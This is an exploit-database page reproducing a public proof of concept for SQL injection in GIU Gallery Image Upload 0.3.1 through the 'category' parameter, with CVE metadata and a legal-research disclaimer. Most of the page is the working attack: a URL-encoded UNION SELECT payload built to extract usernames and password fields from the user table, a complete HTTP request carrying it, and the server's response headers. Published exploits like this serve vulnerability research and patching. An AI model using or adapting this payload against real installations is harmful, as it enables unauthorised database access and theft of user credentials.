GIU Gallery Image Upload 0.3.1 SQL Injection
CVE
Category
Price
Severity
CVE-2020-25883
CWE-89
$500
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2018-10-17
CPE
cpe:cpe:/a:giu:gallery_image_upload:0.3.1
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018100145 Below is a copy:
GIU Gallery Image Upload 0.3.1 SQL Injection # Exploit Title: GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection
# Dork: N/A
# Date: 2018-10-16
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://tradesouthwest.com
# Software Link: https://sourceforge.net/projects/giugalleryimageupload/
# Version: 0.3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?category=[SQL]
%27++unIOn+SElect+0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c(SElect(@x)From(SElect(@x:=0x00)%20%2c(SElect(@x)From(user)WHERE(@x)IN(@x:=COncaT(0x20%2c@x%2c0x557365726e616d65203a%2cfull_name%2c0x3c62723e506173733a20%2cuser_pwd%2c0x3c62723e))))x)%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e--+-
GET /[PATH]/index.php?category=Image%20Gallery%27++unIOn+SElect+0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e%2c(SElect(@x)From(SElect(@x:=0x00)%20%2c(SElect(@x)From(user)WHERE(@x)IN(@x:=COncaT(0x20%2c@x%2c0x557365726e616d65203a%2cfull_name%2c0x3c62723e506173733a20%2cuser_pwd%2c0x3c62723e))))x)%2c0x496873616e53656e63616e%2c0x496873616e53656e63616e--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 16 Oct 2018 00:23:41 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 2300
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum